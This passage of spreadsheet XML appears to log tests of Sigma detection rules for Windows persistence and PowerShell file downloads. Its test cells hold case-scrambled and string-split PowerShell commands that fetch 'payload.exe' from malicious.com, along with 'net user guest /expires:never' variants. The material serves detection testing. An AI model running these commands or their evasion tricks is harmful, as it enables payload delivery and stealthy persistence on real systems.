          <t>Password Set to Never Expire via WMI</t>
        </is>
      </c>
      <c r="D3026" s="44" t="inlineStr">
        <is>
          <t>7864a175-3654-4824-9f0d-f0da18ab27c0</t>
        </is>
      </c>
      <c r="E3026" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -commAnd "Set-LocalUser -Name 'guest' -PasswordNeverExpires $true"</t>
        </is>
      </c>
      <c r="F3026" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3026" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3026" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3026" s="44" t="n"/>
      <c r="J3026" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3026" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3027" ht="15.75" customHeight="1" s="42">
      <c r="A3027" s="44" t="inlineStr">
        <is>
          <t>t1098</t>
        </is>
      </c>
      <c r="B3027" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmi_password_never_expire</t>
        </is>
      </c>
      <c r="C3027" s="44" t="inlineStr">
        <is>
          <t>Password Set to Never Expire via WMI</t>
        </is>
      </c>
      <c r="D3027" s="44" t="inlineStr">
        <is>
          <t>7864a175-3654-4824-9f0d-f0da18ab27c0</t>
        </is>
      </c>
      <c r="E3027" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -cOmmAnD "Set-LocalUser -Name 'guest' -PasswordNeverExpires $true"</t>
        </is>
      </c>
      <c r="F3027" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3027" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3027" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3027" s="43" t="n"/>
      <c r="J3027" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3027" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3028" ht="15.75" customHeight="1" s="42">
      <c r="A3028" s="44" t="inlineStr">
        <is>
          <t>t1098</t>
        </is>
      </c>
      <c r="B3028" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmi_password_never_expire</t>
        </is>
      </c>
      <c r="C3028" s="44" t="inlineStr">
        <is>
          <t>Password Set to Never Expire via WMI</t>
        </is>
      </c>
      <c r="D3028" s="44" t="inlineStr">
        <is>
          <t>7864a175-3654-4824-9f0d-f0da18ab27c0</t>
        </is>
      </c>
      <c r="E3028" s="44" t="inlineStr">
        <is>
          <t>net user guest /expires:never</t>
        </is>
      </c>
      <c r="F3028" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3028" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3028" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3028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28" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3028" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3029" ht="15.75" customHeight="1" s="42">
      <c r="A3029" s="44" t="inlineStr">
        <is>
          <t>t1098</t>
        </is>
      </c>
      <c r="B3029" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmi_password_never_expire</t>
        </is>
      </c>
      <c r="C3029" s="44" t="inlineStr">
        <is>
          <t>Password Set to Never Expire via WMI</t>
        </is>
      </c>
      <c r="D3029" s="44" t="inlineStr">
        <is>
          <t>7864a175-3654-4824-9f0d-f0da18ab27c0</t>
        </is>
      </c>
      <c r="E3029" s="44" t="inlineStr">
        <is>
          <t>net user guest /expiREs:never</t>
        </is>
      </c>
      <c r="F3029" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3029" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3029" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3029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3029" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3029" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3030" ht="15.75" customHeight="1" s="42">
      <c r="A3030" s="44" t="inlineStr">
        <is>
          <t>t1098</t>
        </is>
      </c>
      <c r="B3030" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmi_password_never_expire</t>
        </is>
      </c>
      <c r="C3030" s="44" t="inlineStr">
        <is>
          <t>Password Set to Never Expire via WMI</t>
        </is>
      </c>
      <c r="D3030" s="44" t="inlineStr">
        <is>
          <t>7864a175-3654-4824-9f0d-f0da18ab27c0</t>
        </is>
      </c>
      <c r="E3030" s="44" t="inlineStr">
        <is>
          <t>net user guest -"expires:never"</t>
        </is>
      </c>
      <c r="F3030" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3030" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3030" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3030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3030" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3030" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3031" ht="15.75" customHeight="1" s="42">
      <c r="A3031" s="44" t="inlineStr">
        <is>
          <t>t1098</t>
        </is>
      </c>
      <c r="B3031" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_wmi_password_never_expire</t>
        </is>
      </c>
      <c r="C3031" s="44" t="inlineStr">
        <is>
          <t>Password Set to Never Expire via WMI</t>
        </is>
      </c>
      <c r="D3031" s="44" t="inlineStr">
        <is>
          <t>7864a175-3654-4824-9f0d-f0da18ab27c0</t>
        </is>
      </c>
      <c r="E3031" s="44" t="inlineStr">
        <is>
          <t>net user guest /"expires:never"</t>
        </is>
      </c>
      <c r="F3031" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3031" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3031" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3031" s="4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3031" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3031" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3032" ht="15.75" customHeight="1" s="42">
      <c r="A3032" s="44" t="inlineStr">
        <is>
          <t>t1104</t>
        </is>
      </c>
      <c r="B3032" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_downloadfile</t>
        </is>
      </c>
      <c r="C3032" s="44" t="inlineStr">
        <is>
          <t>PowerShell DownloadFile</t>
        </is>
      </c>
      <c r="D3032" s="44" t="inlineStr">
        <is>
          <t>8f70ac5f-1f6f-4f8e-b454-db19561216c5</t>
        </is>
      </c>
      <c r="E3032" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "$client = New-Object System.Net.WebClient; $method = 'Download' + 'File'; $client.$method('http://example.com/test.txt', 'C:\test.txt')"</t>
        </is>
      </c>
      <c r="F3032" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3032" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3032" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3032" s="44" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J3032" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3032" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3033" ht="15.75" customHeight="1" s="42">
      <c r="A3033" s="44" t="inlineStr">
        <is>
          <t>t1104</t>
        </is>
      </c>
      <c r="B3033" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_downloadfile</t>
        </is>
      </c>
      <c r="C3033" s="44" t="inlineStr">
        <is>
          <t>PowerShell DownloadFile</t>
        </is>
      </c>
      <c r="D3033" s="44" t="inlineStr">
        <is>
          <t>8f70ac5f-1f6f-4f8e-b454-db19561216c5</t>
        </is>
      </c>
      <c r="E3033" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -coMMAnD "$client = New-Object System.Net.WebClient; $method = 'Download' + 'File'; $client.$method('http://example.com/test.txt', 'C:\test.txt')"</t>
        </is>
      </c>
      <c r="F3033" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3033" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3033" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3033" s="44" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J3033" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3033" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3034" ht="15.75" customHeight="1" s="42">
      <c r="A3034" s="43" t="inlineStr">
        <is>
          <t>t1104</t>
        </is>
      </c>
      <c r="B3034" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_downloadfile</t>
        </is>
      </c>
      <c r="C3034" s="43" t="inlineStr">
        <is>
          <t>PowerShell DownloadFile</t>
        </is>
      </c>
      <c r="D3034" s="43" t="inlineStr">
        <is>
          <t>8f70ac5f-1f6f-4f8e-b454-db19561216c5</t>
        </is>
      </c>
      <c r="E3034" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -COMManD "$client = New-Object System.Net.WebClient; $method = 'Download' + 'File'; $client.$method('http://example.com/test.txt', 'C:\test.txt')"</t>
        </is>
      </c>
      <c r="F3034" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3034" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3034" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3034" s="43" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J3034" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K3034" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3035" ht="15.75" customHeight="1" s="42">
      <c r="A3035" s="44" t="inlineStr">
        <is>
          <t>t1104</t>
        </is>
      </c>
      <c r="B3035" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_downloadfile</t>
        </is>
      </c>
      <c r="C3035" s="44" t="inlineStr">
        <is>
          <t>PowerShell DownloadFile</t>
        </is>
      </c>
      <c r="D3035" s="44" t="inlineStr">
        <is>
          <t>8f70ac5f-1f6f-4f8e-b454-db19561216c5</t>
        </is>
      </c>
      <c r="E3035" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -c "$client = New-Object System.Net.WebClient; $method = 'Download' + 'File'; $client.$method('http://example.com/test.txt', 'C:\test.txt')"</t>
        </is>
      </c>
      <c r="F3035" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G3035" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H3035" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3035" s="43" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J3035" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K3035" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3036" ht="15.75" customHeight="1" s="42">
      <c r="A3036" s="43" t="inlineStr">
        <is>
          <t>t1104</t>
        </is>
      </c>
      <c r="B3036" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_downloadfile</t>
        </is>
      </c>
      <c r="C3036" s="44" t="inlineStr">
        <is>
          <t>PowerShell DownloadFile</t>
        </is>
      </c>
      <c r="D3036" s="44" t="inlineStr">
        <is>
          <t>8f70ac5f-1f6f-4f8e-b454-db19561216c5</t>
        </is>
      </c>
      <c r="E3036" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -CommaNd "$client = New-Object System.Net.WebClient; $method = 'Download' + 'File'; $client.$method('http://example.com/test.txt', 'C:\test.txt')"</t>
        </is>
      </c>
      <c r="F3036" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3036" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3036" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3036" s="44" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J3036" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3036" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3037" ht="15.75" customHeight="1" s="42">
      <c r="A3037" s="43" t="inlineStr">
        <is>
          <t>t1104</t>
        </is>
      </c>
      <c r="B3037" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_downloadfile</t>
        </is>
      </c>
      <c r="C3037" s="44" t="inlineStr">
        <is>
          <t>PowerShell DownloadFile</t>
        </is>
      </c>
      <c r="D3037" s="44" t="inlineStr">
        <is>
          <t>8f70ac5f-1f6f-4f8e-b454-db19561216c5</t>
        </is>
      </c>
      <c r="E3037" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -commaND "$client = New-Object System.Net.WebClient; $method = 'Download' + 'File'; $client.$method('http://example.com/test.txt', 'C:\test.txt')"</t>
        </is>
      </c>
      <c r="F3037" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3037" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3037" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3037" s="44" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J3037" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3037" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3038" ht="15.75" customHeight="1" s="42">
      <c r="A3038" s="43" t="inlineStr">
        <is>
          <t>t1104</t>
        </is>
      </c>
      <c r="B3038" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_downloadfile</t>
        </is>
      </c>
      <c r="C3038" s="44" t="inlineStr">
        <is>
          <t>PowerShell DownloadFile</t>
        </is>
      </c>
      <c r="D3038" s="44" t="inlineStr">
        <is>
          <t>8f70ac5f-1f6f-4f8e-b454-db19561216c5</t>
        </is>
      </c>
      <c r="E3038" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "$wc = New-Object ('System.N' + 'et.WebClient'); $wc.DownloadFile('http://example.com/test.txt', 'C:\test.txt')"</t>
        </is>
      </c>
      <c r="F3038" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3038" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3038" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3038" s="44" t="n"/>
      <c r="J3038" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3038" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3039" ht="15.75" customHeight="1" s="42">
      <c r="A3039" s="43" t="inlineStr">
        <is>
          <t>t1104</t>
        </is>
      </c>
      <c r="B3039" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_downloadfile</t>
        </is>
      </c>
      <c r="C3039" s="44" t="inlineStr">
        <is>
          <t>PowerShell DownloadFile</t>
        </is>
      </c>
      <c r="D3039" s="44" t="inlineStr">
        <is>
          <t>8f70ac5f-1f6f-4f8e-b454-db19561216c5</t>
        </is>
      </c>
      <c r="E3039" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -COmMAnd "$wc = New-Object ('System.N' + 'et.WebClient'); $wc.DownloadFile('http://example.com/test.txt', 'C:\test.txt')"</t>
        </is>
      </c>
      <c r="F3039" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3039" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3039" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3039" s="44" t="n"/>
      <c r="J3039" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3039" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3040" ht="15.75" customHeight="1" s="42">
      <c r="A3040" s="43" t="inlineStr">
        <is>
          <t>t1104</t>
        </is>
      </c>
      <c r="B3040" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_downloadfile</t>
        </is>
      </c>
      <c r="C3040" s="44" t="inlineStr">
        <is>
          <t>PowerShell DownloadFile</t>
        </is>
      </c>
      <c r="D3040" s="44" t="inlineStr">
        <is>
          <t>8f70ac5f-1f6f-4f8e-b454-db19561216c5</t>
        </is>
      </c>
      <c r="E3040" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -coMmANd "$wc = New-Object ('System.N' + 'et.WebClient'); $wc.DownloadFile('http://example.com/test.txt', 'C:\test.txt')"</t>
        </is>
      </c>
      <c r="F3040" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3040" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3040" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3040" s="44" t="n"/>
      <c r="J3040" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3040" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3041" ht="15.75" customHeight="1" s="42">
      <c r="A3041" s="43" t="inlineStr">
        <is>
          <t>t1104</t>
        </is>
      </c>
      <c r="B3041" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_downloadfile</t>
        </is>
      </c>
      <c r="C3041" s="44" t="inlineStr">
        <is>
          <t>PowerShell DownloadFile</t>
        </is>
      </c>
      <c r="D3041" s="44" t="inlineStr">
        <is>
          <t>8f70ac5f-1f6f-4f8e-b454-db19561216c5</t>
        </is>
      </c>
      <c r="E3041" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -cOmMand "$wc = New-Object ('System.N' + 'et.WebClient'); $wc.DownloadFile('http://example.com/test.txt', 'C:\test.txt')"</t>
        </is>
      </c>
      <c r="F3041" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3041" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3041" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3041" s="44" t="n"/>
      <c r="J3041" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3041" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3042" ht="15.75" customHeight="1" s="42">
      <c r="A3042" s="43" t="inlineStr">
        <is>
          <t>t1104</t>
        </is>
      </c>
      <c r="B3042" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_downloadfile</t>
        </is>
      </c>
      <c r="C3042" s="44" t="inlineStr">
        <is>
          <t>PowerShell DownloadFile</t>
        </is>
      </c>
      <c r="D3042" s="44" t="inlineStr">
        <is>
          <t>8f70ac5f-1f6f-4f8e-b454-db19561216c5</t>
        </is>
      </c>
      <c r="E3042" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ComManD "$wc = New-Object ('System.N' + 'et.WebClient'); $wc.DownloadFile('http://example.com/test.txt', 'C:\test.txt')"</t>
        </is>
      </c>
      <c r="F3042" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3042" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3042" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3042" s="44" t="n"/>
      <c r="J3042" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3042" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3043" ht="15.75" customHeight="1" s="42">
      <c r="A3043" s="43" t="inlineStr">
        <is>
          <t>t1104</t>
        </is>
      </c>
      <c r="B3043" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_downloadfile</t>
        </is>
      </c>
      <c r="C3043" s="44" t="inlineStr">
        <is>
          <t>PowerShell DownloadFile</t>
        </is>
      </c>
      <c r="D3043" s="44" t="inlineStr">
        <is>
          <t>8f70ac5f-1f6f-4f8e-b454-db19561216c5</t>
        </is>
      </c>
      <c r="E3043" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -c "$wc = New-Object ('System.N' + 'et.WebClient'); $wc.DownloadFile('http://example.com/test.txt', 'C:\test.txt')"</t>
        </is>
      </c>
      <c r="F3043" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3043" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3043" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I3043" s="44" t="n"/>
      <c r="J3043" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3043" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="3044" ht="15.75" customHeight="1" s="42">
      <c r="A3044" s="43" t="inlineStr">
        <is>
          <t>t1104</t>
        </is>
      </c>
      <c r="B3044" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_downloadfile</t>
        </is>
      </c>
      <c r="C3044" s="44" t="inlineStr">
        <is>
          <t>PowerShell DownloadFile</t>
        </is>
      </c>
      <c r="D3044" s="44" t="inlineStr">
        <is>
          <t>8f70ac5f-1f6f-4f8e-b454-db19561216c5</t>
        </is>
      </c>
      <c r="E3044" s="44" t="inlineStr">
        <is>
          <t>powershell -c "(New-Object Net.WebClient).DownloadFile('http://malicious.com/payload.exe', 'C:\payload.exe')"</t>
        </is>
      </c>
      <c r="F3044" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3044" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3044" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3044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44" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3044" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3045" ht="15.75" customHeight="1" s="42">
      <c r="A3045" s="43" t="inlineStr">
        <is>
          <t>t1104</t>
        </is>
      </c>
      <c r="B3045" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_downloadfile</t>
        </is>
      </c>
      <c r="C3045" s="44" t="inlineStr">
        <is>
          <t>PowerShell DownloadFile</t>
        </is>
      </c>
      <c r="D3045" s="44" t="inlineStr">
        <is>
          <t>8f70ac5f-1f6f-4f8e-b454-db19561216c5</t>
        </is>
      </c>
      <c r="E3045" s="44" t="inlineStr">
        <is>
          <t>powershell -Command "(New-Object Net.WebClient).DownloadFile('http://malicious.com/payload.exe', 'C:\payload.exe')"</t>
        </is>
      </c>
      <c r="F3045" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3045" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3045" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I304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45" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3045" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3046" ht="15.75" customHeight="1" s="42">
      <c r="A3046" s="43" t="inlineStr">
        <is>
          <t>t1104</t>
        </is>
      </c>
      <c r="B3046" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_downloadfile</t>
        </is>
      </c>
      <c r="C3046" s="44" t="inlineStr">
        <is>
          <t>PowerShell DownloadFile</t>
        </is>
      </c>
      <c r="D3046" s="44" t="inlineStr">
        <is>
          <t>8f70ac5f-1f6f-4f8e-b454-db19561216c5</t>
        </is>
      </c>
      <c r="E3046" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -c "Invoke-WebRequest -Uri 'http://malicious.com/payload.exe' -OutFile 'C:\payload.exe'"</t>
        </is>
      </c>
      <c r="F3046" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3046" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3046" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3046" s="44" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J3046" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3046" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3047" ht="15.75" customHeight="1" s="42">
      <c r="A3047" s="43" t="inlineStr">
        <is>
          <t>t1104</t>
        </is>
      </c>
      <c r="B3047" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_downloadfile</t>
        </is>
      </c>
      <c r="C3047" s="44" t="inlineStr">
        <is>
          <t>PowerShell DownloadFile</t>
        </is>
      </c>
      <c r="D3047" s="44" t="inlineStr">
        <is>
          <t>8f70ac5f-1f6f-4f8e-b454-db19561216c5</t>
        </is>
      </c>
      <c r="E3047" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Invoke-WebRequest -Uri 'http://malicious.com/payload.exe' -OutFile 'C:\payload.exe'"</t>
        </is>
      </c>
      <c r="F3047" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3047" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3047" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3047" s="44" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J3047" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3047" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3048" ht="15.75" customHeight="1" s="42">
      <c r="A3048" s="43" t="inlineStr">
        <is>
          <t>t1104</t>
        </is>
      </c>
      <c r="B3048" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_downloadfile</t>
        </is>
      </c>
      <c r="C3048" s="44" t="inlineStr">
        <is>
          <t>PowerShell DownloadFile</t>
        </is>
      </c>
      <c r="D3048" s="44" t="inlineStr">
        <is>
          <t>8f70ac5f-1f6f-4f8e-b454-db19561216c5</t>
        </is>
      </c>
      <c r="E3048" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -C "Invoke-WebRequest -Uri 'http://malicious.com/payload.exe' -OutFile 'C:\payload.exe'"</t>
        </is>
      </c>
      <c r="F3048" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3048" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3048" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3048" s="43" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J3048" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3048" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3049" ht="15.75" customHeight="1" s="42">
      <c r="A3049" s="43" t="inlineStr">
        <is>
          <t>t1104</t>
        </is>
      </c>
      <c r="B3049" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_downloadfile</t>
        </is>
      </c>
      <c r="C3049" s="44" t="inlineStr">
        <is>
          <t>PowerShell DownloadFile</t>
        </is>
      </c>
      <c r="D3049" s="44" t="inlineStr">
        <is>
          <t>8f70ac5f-1f6f-4f8e-b454-db19561216c5</t>
        </is>
      </c>
      <c r="E3049" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "$wc = New-Object System.Net.WebClient; $method = 'Download' + 'File'; $wc.$method.Invoke('http://example.com/payload.exe', 'C:\Temp\payload.exe')"</t>
        </is>
      </c>
      <c r="F3049" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3049" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3049" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3049" s="44" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J3049" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K3049" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3050" ht="15.75" customHeight="1" s="42">
      <c r="A3050" s="43" t="inlineStr">
        <is>
          <t>t1104</t>
        </is>
      </c>
      <c r="B3050" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_susp_ps_downloadfile</t>
        </is>
      </c>
      <c r="C3050" s="44" t="inlineStr">
        <is>
          <t>PowerShell DownloadFile</t>
        </is>
      </c>
      <c r="D3050" s="44" t="inlineStr">
        <is>
          <t>8f70ac5f-1f6f-4f8e-b454-db19561216c5</t>
        </is>
      </c>
      <c r="E3050" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -c "$wc = New-Object System.Net.WebClient; $method = 'Download' + 'File'; $wc.$method.Invoke('http://example.com/payload.exe', 'C:\Temp\payload.exe')"</t>
        </is>
      </c>
      <c r="F3050" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G3050" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H3050" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I3050" s="43" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
